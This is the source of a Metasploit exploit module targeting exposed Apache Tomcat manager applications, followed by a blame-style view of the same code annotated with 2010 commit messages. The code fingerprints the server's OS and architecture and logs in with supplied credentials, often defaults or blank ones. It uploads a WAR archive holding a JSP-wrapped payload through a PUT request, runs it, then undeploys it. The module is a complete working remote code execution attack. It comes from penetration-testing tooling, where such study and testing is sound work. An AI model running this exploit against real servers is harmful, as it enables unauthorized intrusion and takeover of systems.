metasploit-framework/modules/exploits/multi/http/tomcat_mgr_deploy.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'        => 'Apache Tomcat Manager Application Deployer Upload and Execute',
			'Description'    => %q{
					This module can be used to execute a payload on Apache Tomcat servers that
				have an exposed "manager" application. The payload is uploaded as a WAR archive
				containing a jsp application using a PUT request.

				The manager application can also be abused using /manager/html/upload, but that
				method is not implemented in this module.
			},
			'Author'      => [ 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'     => '$Revision$',
			'References'  =>
				[
					# There is no single vulnerability associated with deployment functionality.
					# Instead, the focus has been on insecure/blank/hardcoded default passwords.

					# The following references refer to HP Operations Manager
					[ 'CVE', '2009-3843' ],
					[ 'OSVDB', '60317' ],
               [ 'CVE', '2009-4189' ],
					[ 'OSVDB', '60670' ],

					# HP Operations Dashboard
					[ 'CVE', '2009-4188' ],

					# 'admin' password is blank in default Windows installer
					[ 'CVE', '2009-3548' ],
					[ 'OSVDB', '60176' ],
					[ 'BID', '36954' ],

					# tomcat docs
					[ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ]
				],
			'Platform'    => [ 'win', 'linux' ], # others?
			'Targets'     =>
				[
					#
					# detect via /manager/serverinfo
					#
					[ 'Automatic', { } ],

					#
					# Platform specific targets only
					#
					[ 'Windows Universal',
						{
							'Arch' => ARCH_X86,
							'Platform' => 'win'
						},
					],

					[ 'Linux X86',
						{
							'Arch' => ARCH_X86,
							'Platform' => 'linux'
						},
					],

					[ 'Linux X86_64',
						{
							'Arch' => ARCH_X86_64,
							'Platform' => 'linux'
						},
					],

				],
			'DefaultTarget'  => 0))

		register_options(
			[
				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
				OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
				OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
				# /cognos_express/manager/ for Cognos Express (19300)
				OptString.new('PATH', [ true,  "The URI path of the manager app (/deploy and /undeploy will be used)", '/manager'])
			], self.class)
	end


	def auto_target
		print_status("Attempting to automatically select a target...")

		path = datastore['PATH'] + '/serverinfo'
		res = send_request_raw(
			{
				'uri'   => path
			}, 10)

		if (not res) or (res.code != 200)
			print_error("Failed: Error requesting #{path}")
			return nil
		end

		arch = nil
		plat = nil
		res.body.each_line { |ln|
			ln.chomp!

			print_status('  ' + ln) if datastore['VERBOSE']

			case ln

			when /OS Name: /
				os = ln.split(':')[1]
				case os

				when /Windows/
					plat = 'win'

				when /Linux/
					plat = 'linux'

				end

			when /OS Architecture: /
				ar = ln.split(':')[1].strip
				case ar

				when 'x86', 'i386', 'i686'
					arch = ARCH_X86

				when 'x86_64', 'amd64'
					arch = ARCH_X86_64

				end

			end
		}

		# No arch or platform found?
		if (not arch or not plat)
			return nil
		end

		# see if we have a match
		targets.each { |t|
			if (t['Platform'] == plat) and (t['Arch'] == arch)
				return t
			end
		}

		# no matching target found
		return nil
	end


	def exploit
		datastore['BasicAuthUser'] = datastore['USERNAME']
		datastore['BasicAuthPass'] = datastore['PASSWORD']

		mytarget = target
		if (target.name =~ /Automatic/)
			mytarget = auto_target
			if (not mytarget)
				raise RuntimeError, "Unable to automatically select a target"
			end
			print_status("Automatically selected target \"#{mytarget.name}\"")
		else
			print_status("Using manually select target \"#{mytarget.name}\"")
		end

		# set arch/platform from the target
		arch = mytarget['Arch']
		plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]

		# Generate the WAR containing the EXE containing the payload
		jsp_name = rand_text_alphanumeric(4+rand(32-4))
		war = Msf::Util::EXE.to_jsp_war(framework,
			arch, plat,
			payload.encoded,
			:jsp_name => jsp_name)

		app_base = rand_text_alphanumeric(4+rand(32-4))
		query_str = "?path=/" + app_base

		#
		# UPLOAD
		#
		path_tmp = datastore['PATH'] + "/deploy" + query_str
		print_status("Uploading #{war.length} bytes as #{app_base}.war ...")
		res = send_request_cgi({
			'uri'          => path_tmp,
			'method'       => 'PUT',
			'ctype'        => 'application/octet-stream',
			'data'         => war,
		}, 20)
		if (! res)
			raise RuntimeError, "Upload failed on #{path_tmp} [No Response]"
		end
		if (res.code < 200 or res.code >= 300)
			case res.code
			when 401
				print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
			end
			raise RuntimeError, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]"
		end

		#
		# EXECUTE
		#
		jsp_path = '/' + app_base + '/' + jsp_name + '.jsp'
		print_status("Executing #{jsp_path}...")
		res = send_request_cgi({
			'uri'          => jsp_path,
			'method'       => 'GET'
		}, 20)

		if (! res)
			print_error("Execution failed on #{app_base} [No Response]")
		elsif (res.code < 200 or res.code >= 300)
			print_error("Execution failed on #{app_base} [#{res.code} #{res.message}]")
			print_status(res.body) if datastore['VERBOSE']
		end

		#
		# DELETE
		#
		path_tmp = datastore['PATH'] + "/undeploy" + query_str
		print_status("Undeploying #{app_base} ...")
		res = send_request_cgi({
			'uri'          => path_tmp,
			'method'       => 'GET'
		}, 20)
		if (! res)
			print_error("WARNING: Undeployment failed on #{path} [No Response]")
		elsif (res.code < 200 or res.code >= 300)
			print_error("Deletion failed on #{path} [#{res.code} #{res.message}]")
		end

		handler
	end

end
add exploit module to get code exec on a tomcat manager instance, closes #772 git-svn-id: file:///home/svn/framework3/trunk@8552 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-18 18:18:43 +00:00			`##`
			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Apache Tomcat Manager Application Deployer Upload and Execute',`
			`'Description' => %q{`
			`This module can be used to execute a payload on Apache Tomcat servers that`
			`have an exposed "manager" application. The payload is uploaded as a WAR archive`
			`containing a jsp application using a PUT request.`

			`The manager application can also be abused using /manager/html/upload, but that`
			`method is not implemented in this module.`
			`},`
			`'Author' => [ 'jduck' ],`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
			`# There is no single vulnerability associated with deployment functionality.`
			`# Instead, the focus has been on insecure/blank/hardcoded default passwords.`

			`# The following references refer to HP Operations Manager`
			`[ 'CVE', '2009-3843' ],`
			`[ 'OSVDB', '60317' ],`
add additional CVE reference, cleanup references git-svn-id: file:///home/svn/framework3/trunk@9642 4d416f70-5f16-0410-b530-b9f4589650da 2010-07-01 19:42:11 +00:00			`[ 'CVE', '2009-4189' ],`
			`[ 'OSVDB', '60670' ],`

			`# HP Operations Dashboard`
			`[ 'CVE', '2009-4188' ],`

			`# 'admin' password is blank in default Windows installer`
			`[ 'CVE', '2009-3548' ],`
			`[ 'OSVDB', '60176' ],`
			`[ 'BID', '36954' ],`
add exploit module to get code exec on a tomcat manager instance, closes #772 git-svn-id: file:///home/svn/framework3/trunk@8552 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-18 18:18:43 +00:00
			`# tomcat docs`
			`[ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ]`
			`],`
add linux x86/x86_64 support for tomcat manger deploy, see #1016 git-svn-id: file:///home/svn/framework3/trunk@8853 4d416f70-5f16-0410-b530-b9f4589650da 2010-03-19 02:13:02 +00:00			`'Platform' => [ 'win', 'linux' ], # others?`
add exploit module to get code exec on a tomcat manager instance, closes #772 git-svn-id: file:///home/svn/framework3/trunk@8552 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-18 18:18:43 +00:00			`'Targets' =>`
			`[`
add auto-targeting to tomcat_mgr_deploy, fixes #887 git-svn-id: file:///home/svn/framework3/trunk@8564 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-20 01:14:39 +00:00			`#`
			`# detect via /manager/serverinfo`
			`#`
add exploit module to get code exec on a tomcat manager instance, closes #772 git-svn-id: file:///home/svn/framework3/trunk@8552 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-18 18:18:43 +00:00			`[ 'Automatic', { } ],`
add auto-targeting to tomcat_mgr_deploy, fixes #887 git-svn-id: file:///home/svn/framework3/trunk@8564 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-20 01:14:39 +00:00
			`#`
			`# Platform specific targets only`
			`#`
			`[ 'Windows Universal',`
			`{`
			`'Arch' => ARCH_X86,`
			`'Platform' => 'win'`
			`},`
add linux x86/x86_64 support for tomcat manger deploy, see #1016 git-svn-id: file:///home/svn/framework3/trunk@8853 4d416f70-5f16-0410-b530-b9f4589650da 2010-03-19 02:13:02 +00:00			`],`

			`[ 'Linux X86',`
			`{`
			`'Arch' => ARCH_X86,`
			`'Platform' => 'linux'`
			`},`
			`],`

			`[ 'Linux X86_64',`
			`{`
			`'Arch' => ARCH_X86_64,`
			`'Platform' => 'linux'`
			`},`
			`],`
Remove silly cases of print_good git-svn-id: file:///home/svn/framework3/trunk@9021 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-05 23:34:10 +00:00
add exploit module to get code exec on a tomcat manager instance, closes #772 git-svn-id: file:///home/svn/framework3/trunk@8552 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-18 18:18:43 +00:00			`],`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
add verbose option git-svn-id: file:///home/svn/framework3/trunk@8761 4d416f70-5f16-0410-b530-b9f4589650da 2010-03-10 05:55:47 +00:00			`OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),`
use the same option names for user/pass git-svn-id: file:///home/svn/framework3/trunk@8674 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-26 22:14:58 +00:00			`OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),`
			`OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),`
add CVE for cognos express git-svn-id: file:///home/svn/framework3/trunk@9502 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-12 09:37:21 +00:00			`# /cognos_express/manager/ for Cognos Express (19300)`
add exploit module to get code exec on a tomcat manager instance, closes #772 git-svn-id: file:///home/svn/framework3/trunk@8552 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-18 18:18:43 +00:00			`OptString.new('PATH', [ true, "The URI path of the manager app (/deploy and /undeploy will be used)", '/manager'])`
			`], self.class)`
			`end`


add auto-targeting to tomcat_mgr_deploy, fixes #887 git-svn-id: file:///home/svn/framework3/trunk@8564 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-20 01:14:39 +00:00			`def auto_target`
			`print_status("Attempting to automatically select a target...")`

			`path = datastore['PATH'] + '/serverinfo'`
			`res = send_request_raw(`
			`{`
			`'uri' => path`
			`}, 10)`

			`if (not res) or (res.code != 200)`
			`print_error("Failed: Error requesting #{path}")`
			`return nil`
			`end`

			`arch = nil`
			`plat = nil`
			`res.body.each_line { \|ln\|`
			`ln.chomp!`
add verbose option git-svn-id: file:///home/svn/framework3/trunk@8761 4d416f70-5f16-0410-b530-b9f4589650da 2010-03-10 05:55:47 +00:00
			`print_status(' ' + ln) if datastore['VERBOSE']`

add auto-targeting to tomcat_mgr_deploy, fixes #887 git-svn-id: file:///home/svn/framework3/trunk@8564 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-20 01:14:39 +00:00			`case ln`

			`when /OS Name: /`
			`os = ln.split(':')[1]`
			`case os`

			`when /Windows/`
			`plat = 'win'`
handle missing targets more gracefully, stub out linux and x86_64 support detection git-svn-id: file:///home/svn/framework3/trunk@8729 4d416f70-5f16-0410-b530-b9f4589650da 2010-03-05 17:35:18 +00:00
			`when /Linux/`
			`plat = 'linux'`

add auto-targeting to tomcat_mgr_deploy, fixes #887 git-svn-id: file:///home/svn/framework3/trunk@8564 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-20 01:14:39 +00:00			`end`

			`when /OS Architecture: /`
			`ar = ln.split(':')[1].strip`
			`case ar`

add linux x86/x86_64 support for tomcat manger deploy, see #1016 git-svn-id: file:///home/svn/framework3/trunk@8853 4d416f70-5f16-0410-b530-b9f4589650da 2010-03-19 02:13:02 +00:00			`when 'x86', 'i386', 'i686'`
add auto-targeting to tomcat_mgr_deploy, fixes #887 git-svn-id: file:///home/svn/framework3/trunk@8564 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-20 01:14:39 +00:00			`arch = ARCH_X86`
handle missing targets more gracefully, stub out linux and x86_64 support detection git-svn-id: file:///home/svn/framework3/trunk@8729 4d416f70-5f16-0410-b530-b9f4589650da 2010-03-05 17:35:18 +00:00
support amd64 arch git-svn-id: file:///home/svn/framework3/trunk@9025 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-06 04:08:39 +00:00			`when 'x86_64', 'amd64'`
handle missing targets more gracefully, stub out linux and x86_64 support detection git-svn-id: file:///home/svn/framework3/trunk@8729 4d416f70-5f16-0410-b530-b9f4589650da 2010-03-05 17:35:18 +00:00			`arch = ARCH_X86_64`

add auto-targeting to tomcat_mgr_deploy, fixes #887 git-svn-id: file:///home/svn/framework3/trunk@8564 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-20 01:14:39 +00:00			`end`

			`end`
			`}`

handle missing targets more gracefully, stub out linux and x86_64 support detection git-svn-id: file:///home/svn/framework3/trunk@8729 4d416f70-5f16-0410-b530-b9f4589650da 2010-03-05 17:35:18 +00:00			`# No arch or platform found?`
			`if (not arch or not plat)`
			`return nil`
			`end`

add auto-targeting to tomcat_mgr_deploy, fixes #887 git-svn-id: file:///home/svn/framework3/trunk@8564 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-20 01:14:39 +00:00			`# see if we have a match`
			`targets.each { \|t\|`
			`if (t['Platform'] == plat) and (t['Arch'] == arch)`
			`return t`
			`end`
			`}`

			`# no matching target found`
			`return nil`
			`end`


add exploit module to get code exec on a tomcat manager instance, closes #772 git-svn-id: file:///home/svn/framework3/trunk@8552 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-18 18:18:43 +00:00			`def exploit`
move USERNAME/PASSWORD setting to exploit instead of auto_target so manual targets work - fixes #1416 git-svn-id: file:///home/svn/framework3/trunk@8967 4d416f70-5f16-0410-b530-b9f4589650da 2010-03-31 22:29:47 +00:00			`datastore['BasicAuthUser'] = datastore['USERNAME']`
			`datastore['BasicAuthPass'] = datastore['PASSWORD']`
add exploit module to get code exec on a tomcat manager instance, closes #772 git-svn-id: file:///home/svn/framework3/trunk@8552 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-18 18:18:43 +00:00
add auto-targeting to tomcat_mgr_deploy, fixes #887 git-svn-id: file:///home/svn/framework3/trunk@8564 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-20 01:14:39 +00:00			`mytarget = target`
			`if (target.name =~ /Automatic/)`
			`mytarget = auto_target`
			`if (not mytarget)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`raise RuntimeError, "Unable to automatically select a target"`
add auto-targeting to tomcat_mgr_deploy, fixes #887 git-svn-id: file:///home/svn/framework3/trunk@8564 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-20 01:14:39 +00:00			`end`
			`print_status("Automatically selected target \"#{mytarget.name}\"")`
			`else`
			`print_status("Using manually select target \"#{mytarget.name}\"")`
			`end`

			`# set arch/platform from the target`
			`arch = mytarget['Arch']`
			`plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]`
add exploit module to get code exec on a tomcat manager instance, closes #772 git-svn-id: file:///home/svn/framework3/trunk@8552 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-18 18:18:43 +00:00
			`# Generate the WAR containing the EXE containing the payload`
			`jsp_name = rand_text_alphanumeric(4+rand(32-4))`
			`war = Msf::Util::EXE.to_jsp_war(framework,`
			`arch, plat,`
			`payload.encoded,`
			`:jsp_name => jsp_name)`

			`app_base = rand_text_alphanumeric(4+rand(32-4))`
			`query_str = "?path=/" + app_base`

			`#`
			`# UPLOAD`
			`#`
			`path_tmp = datastore['PATH'] + "/deploy" + query_str`
remove app_name variable git-svn-id: file:///home/svn/framework3/trunk@8619 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-24 16:53:55 +00:00			`print_status("Uploading #{war.length} bytes as #{app_base}.war ...")`
add exploit module to get code exec on a tomcat manager instance, closes #772 git-svn-id: file:///home/svn/framework3/trunk@8552 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-18 18:18:43 +00:00			`res = send_request_cgi({`
			`'uri' => path_tmp,`
			`'method' => 'PUT',`
			`'ctype' => 'application/octet-stream',`
			`'data' => war,`
			`}, 20)`
			`if (! res)`
			`raise RuntimeError, "Upload failed on #{path_tmp} [No Response]"`
			`end`
			`if (res.code < 200 or res.code >= 300)`
			`case res.code`
			`when 401`
			`print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] \|\| res.headers['Authentication']}")`
			`end`
			`raise RuntimeError, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]"`
			`end`

			`#`
			`# EXECUTE`
			`#`
add linux x86/x86_64 support for tomcat manger deploy, see #1016 git-svn-id: file:///home/svn/framework3/trunk@8853 4d416f70-5f16-0410-b530-b9f4589650da 2010-03-19 02:13:02 +00:00			`jsp_path = '/' + app_base + '/' + jsp_name + '.jsp'`
			`print_status("Executing #{jsp_path}...")`
add exploit module to get code exec on a tomcat manager instance, closes #772 git-svn-id: file:///home/svn/framework3/trunk@8552 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-18 18:18:43 +00:00			`res = send_request_cgi({`
add linux x86/x86_64 support for tomcat manger deploy, see #1016 git-svn-id: file:///home/svn/framework3/trunk@8853 4d416f70-5f16-0410-b530-b9f4589650da 2010-03-19 02:13:02 +00:00			`'uri' => jsp_path,`
add exploit module to get code exec on a tomcat manager instance, closes #772 git-svn-id: file:///home/svn/framework3/trunk@8552 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-18 18:18:43 +00:00			`'method' => 'GET'`
			`}, 20)`

			`if (! res)`
			`print_error("Execution failed on #{app_base} [No Response]")`
			`elsif (res.code < 200 or res.code >= 300)`
			`print_error("Execution failed on #{app_base} [#{res.code} #{res.message}]")`
add linux x86/x86_64 support for tomcat manger deploy, see #1016 git-svn-id: file:///home/svn/framework3/trunk@8853 4d416f70-5f16-0410-b530-b9f4589650da 2010-03-19 02:13:02 +00:00			`print_status(res.body) if datastore['VERBOSE']`
add exploit module to get code exec on a tomcat manager instance, closes #772 git-svn-id: file:///home/svn/framework3/trunk@8552 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-18 18:18:43 +00:00			`end`

			`#`
			`# DELETE`
			`#`
			`path_tmp = datastore['PATH'] + "/undeploy" + query_str`
			`print_status("Undeploying #{app_base} ...")`
			`res = send_request_cgi({`
			`'uri' => path_tmp,`
			`'method' => 'GET'`
			`}, 20)`
			`if (! res)`
			`print_error("WARNING: Undeployment failed on #{path} [No Response]")`
			`elsif (res.code < 200 or res.code >= 300)`
			`print_error("Deletion failed on #{path} [#{res.code} #{res.message}]")`
			`end`

			`handler`
			`end`

			`end`
Remove silly cases of print_good git-svn-id: file:///home/svn/framework3/trunk@9021 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-05 23:34:10 +00:00